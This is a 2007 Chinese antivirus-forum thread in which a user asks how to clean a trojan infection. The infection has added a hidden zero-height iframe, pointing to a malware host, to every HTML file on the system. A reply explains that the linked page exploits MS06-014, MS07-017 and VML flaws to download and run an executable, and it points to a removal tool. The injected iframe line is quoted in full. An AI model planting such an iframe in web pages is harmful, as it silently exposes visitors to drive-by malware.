瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【原创】系统中全部html文件被感染上了病毒,该如何处理?

1   1  /  1  页   跳转

【原创】系统中全部html文件被感染上了病毒,该如何处理?

【原创】系统中全部html文件被感染上了病毒,该如何处理?

有一次别人用我的电脑上网,关闭的防火墙,访问的网址是www.onlinedowns.net,然后就中毒了。现在打开IE时,经常会出现瑞星报发现病毒,病毒为:Trojan.DL.JS.Agent.lii,处理方式为跳过脚本。然后发现全系统中所有的html类型的文件在<body>标签后面都加上了<iframe src=http://down.onlinedowns.net/page/image/pd.htm height=0></iframe>,这样,你打开该页面的时候,瑞星就会报上面发现的病毒。由于很多软件打开的时候都会加载一些系统本身的页面文件,因此,总是会出现病毒报告。不知道各位网友碰到过这样的问题没有,该如何解决,谢谢。

[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
最后编辑2007-08-13 12:15:09
分享到:
gototop
 

pd.htm,利用MS06-014漏洞(如不成功,则转而利用MS07-017及VML漏洞)下载http://down.onlinedowns.net/page/image/down.exe到本机并执行。

down.exe,现瑞星已可查杀,病毒名Trojan.Win32.Agent.ici

网页文件中添加的代码,如杀毒软件不能清除,可使用以下工具清除,下载页面:
http://www.vaid.cn/blog/read.php?9
请按页面中的说明正确使用。
gototop
 

非常感谢!!!
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT